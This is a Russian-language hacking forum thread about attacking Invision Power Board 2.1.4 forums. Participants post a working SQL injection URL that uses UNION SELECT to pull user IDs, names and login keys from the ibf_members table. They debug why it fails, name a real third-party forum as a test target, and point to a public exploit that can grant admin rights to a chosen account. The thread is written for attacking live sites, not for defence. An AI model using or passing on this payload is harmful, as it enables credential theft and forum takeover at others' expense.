Эсть IPB 2.1.4
Уязвим.
Вот такая ссылка:
index.php?&act=Post&CODE=02&f=3&t=9&qpid=666666666)%20union%20select%201,1,1,1,1,1,1,1 ,1,1,CONCAT(id,char(58),name,char(58),member_login _key),1,1,1,1,1,1,1,1,1%20from%20ibf_members%20%20 WHERE%20id=1%20/*
выдает цитату на 58 пост.
И все.
Префикс ibf_ (точно! index.php?act=task&ck=' проверено =))) )

В чем может быть трабла?

Эсть IPB 2.1.4
Уязвим.
Вот такая ссылка:
index.php?&act=Post&CODE=02&f=3&t=9&qpid=666666666)%20union%20select%201,1,1,1,1,1,1,1 ,1,1,CONCAT(id,char(58),name,char(58),member_login _key),1,1,1,1,1,1,1,1,1%20from%20ibf_members%20%20 WHERE%20id=1%20/*

Думаю оффтоп, но все-таки скажу в конце ссылки /* нету...

То я видимо часть не скопировал. она эсть.

index.php?&act=Post&CODE=02&f=3&t=9&qpid=666666666) union select 1,1,1,1,1,1,1,1,1,1,CONCAT(id,char(58),name,char(5 8),member_login_key),1,1,1,1,1,1,1,1,1 from ibf_members WHERE id=1 /*

Кинь ссылку в ПМ, посмотрю что можно сделать...

Проверил на другом форуме - тоже самое :'(

и еще на одном :(

идей нет? :(

дай ссылку на какой-нить форум!

к примеру http://www.gameforums.jino-net.ru

_ttp://www.milw0rm.com/exploits/2010
сполит с гуи канает на том :) просто лень инъекцию мутить :)

А как с ним работать?
Пишет что форум уязвим.
При попытке узнать префикс - ошибка. но префикс то ibf_
При нажатии "Get data from database" все время получаю разные хеши. В чем дело?

не знаю, я потестил где-то на 20 уязвимых форумах, на всех префикс обнаружил.

_ttp://www.milw0rm.com/exploits/2010
сполит с гуи канает на том :) просто лень инъекцию мутить :)
Скажи плз что этот сплоит делает :)

Скажи плз что этот сплоит делает :)
usery s id=* - какое поставишь можешь присвоить права админа, если укажешь в полях:

$new_admin_name = 'rstghc';
$new_admin_password = 'rstghc';

существующего пользователя(т.е. зареганый твой) - на большинство форумах эта баGа неработает(((!